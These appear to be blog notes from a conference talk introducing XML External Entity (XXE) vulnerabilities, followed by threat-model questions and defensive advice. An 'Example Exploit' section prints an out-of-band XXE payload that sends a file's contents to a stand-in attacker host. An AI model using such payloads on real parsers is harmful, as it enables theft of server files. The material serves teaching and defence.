XXE For Dummies
XML eXternal Entities
Notes from BSidesPDX talk by @brimy; giving a great introduction on how XXE vulnerabilities operate. Video posted
Added to the OWASP 10 in 2017
Entities
HTML “Entities” are the usual entrypoint.
& -> &
rendered, triggers.
XML has User-Defined Entities
<!eNTITY xml “Extensible Markup Language”>
External Entities
<!ENTITY chapter1 SYSTEM "chapter1.txt">
Tag rendering executes call to find the contents of chapter1.txt
and render it.
Enables users to execute XML at the rendering phase, and access and return sensitive data.
Example Exploit
evil.com/evil.dtd http://evil.com/evil.htm?payload=&file;
<!ENTITY % all
"<!ENTITY send SYSTEM 'http://evil.com/evil.html?payload=%file;'>"
>
%all;
Threat Model Questions to Ask
Does your server allow DTD? .Net is one of the primary vulnerabilities; .NET < 4.5.2 is vulnerable to default hacks.
- Do you allow external entities?(You shouldn’t)
- Do you validate un-trusted input?(You always should)
DO: Update Parsers, Disable DTD & XXE, validate input, if necessary set policies for resolving URLs.
Read other posts